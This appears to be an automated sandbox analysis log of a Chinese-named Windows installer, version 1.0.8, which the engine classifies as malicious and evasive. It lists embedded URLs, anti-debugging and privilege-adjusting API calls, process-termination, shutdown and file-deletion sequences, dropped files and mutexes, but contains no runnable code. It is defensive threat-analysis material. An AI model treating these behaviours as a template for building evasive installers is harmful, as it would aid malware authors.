Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1948621226.0000000004139000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.0000000003E79000.00000004.00001000.00020000.00000000.sdmp, is-RO25N.tmp.5.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000000.1763590126.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000000.1779966941.000000000119D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .=~
Source: hrsw.vbc.5.drStatic PE information: section name: .=~
Source: update.vac.5.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C883886
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA05120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,5_2_6CA05120
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C883C62
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C883D18
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA05D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,5_2_6CA05D60
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C883D62
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C8839CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C8839CF
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C883A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,5_2_6C883A6A
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C881950: CreateFileA,DeviceIoControl,CloseHandle,5_2_6C881950
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C884754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,5_2_6C884754
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C8847545_2_6C884754
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C894A275_2_6C894A27
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA018805_2_6CA01880
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA06A435_2_6CA06A43
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA66CE05_2_6CA66CE0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB3D505_2_6CAB3D50
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA38EA15_2_6CA38EA1
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB9E805_2_6CAB9E80
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA52EC95_2_6CA52EC9
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAAE8105_2_6CAAE810
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB99F05_2_6CAB99F0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CACA9305_2_6CACA930
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA389725_2_6CA38972
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB1AA05_2_6CAB1AA0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAC4AA05_2_6CAC4AA0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAADAD05_2_6CAADAD0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAAFA505_2_6CAAFA50
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA40BCA5_2_6CA40BCA
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA50B665_2_6CA50B66
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA5540A5_2_6CA5540A
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB25805_2_6CAB2580
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CABF5C05_2_6CABF5C0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB96E05_2_6CAB96E0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA3C7CF5_2_6CA3C7CF
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAD97005_2_6CAD9700
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAB00205_2_6CAB0020
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CAC37505_2_6CAC3750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AA81EC9_2_00AA81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A7E00A9_2_00A7E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE81C09_2_00AE81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE22E09_2_00AE22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF82409_2_00AF8240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFC3C09_2_00AFC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00B023009_2_00B02300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ACE49F9_2_00ACE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF04C89_2_00AF04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE25F09_2_00AE25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADA6A09_2_00ADA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AD66D09_2_00AD66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AD86509_2_00AD8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFE9909_2_00AFE990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AB09439_2_00AB0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADC9509_2_00ADC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE2A809_2_00AE2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ABAB119_2_00ABAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE6CE09_2_00AE6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AD8C209_2_00AD8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF4EA09_2_00AF4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF0E009_2_00AF0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AC10AC9_2_00AC10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AED0899_2_00AED089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADB1809_2_00ADB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE51809_2_00AE5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF91C09_2_00AF91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADD1D09_2_00ADD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ACB1219_2_00ACB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF11209_2_00AF1120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFD2C09_2_00AFD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF72009_2_00AF7200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AEF3A09_2_00AEF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A8B3E49_2_00A8B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AC53F39_2_00AC53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A653CF9_2_00A653CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFF3C09_2_00AFF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AAD4969_2_00AAD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF54D09_2_00AF54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AEF4209_2_00AEF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AD74109_2_00AD7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFD4709_2_00AFD470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFF5999_2_00AFF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF35309_2_00AF3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00B0351A9_2_00B0351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADF5009_2_00ADF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A615729_2_00A61572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF15509_2_00AF1550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AED6A09_2_00AED6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00B036019_2_00B03601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AB96529_2_00AB9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A697CA9_2_00A697CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AF77C09_2_00AF77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A797669_2_00A79766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A8F8E09_2_00A8F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AFD9E09_2_00AFD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADF9109_2_00ADF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A61AA19_2_00A61AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AB3AEF9_2_00AB3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE7AF09_2_00AE7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A7BAC99_2_00A7BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A7BC929_2_00A7BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE7C509_2_00AE7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00ADFDF09_2_00ADFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE5E809_2_00AE5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00AE5F809_2_00AE5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A61E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00AFFB10 appears 720 times
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: String function: 6CAD6F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: String function: 6CA39240 appears 31 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1762157926.000000007F38A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000003.1761774059.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, 00000000.00000000.1759621970.0000000000E69000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.11.drBinary string: \Device\TfSysMon
Source: tProtect.dll.11.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@144/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA05D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,5_2_6CA05D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A69313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_00A69313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A73D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00A73D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A69252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_00A69252
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6CA05240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,5_2_6CA05240
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-98LL2.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7900:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5740:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmpJump to behavior
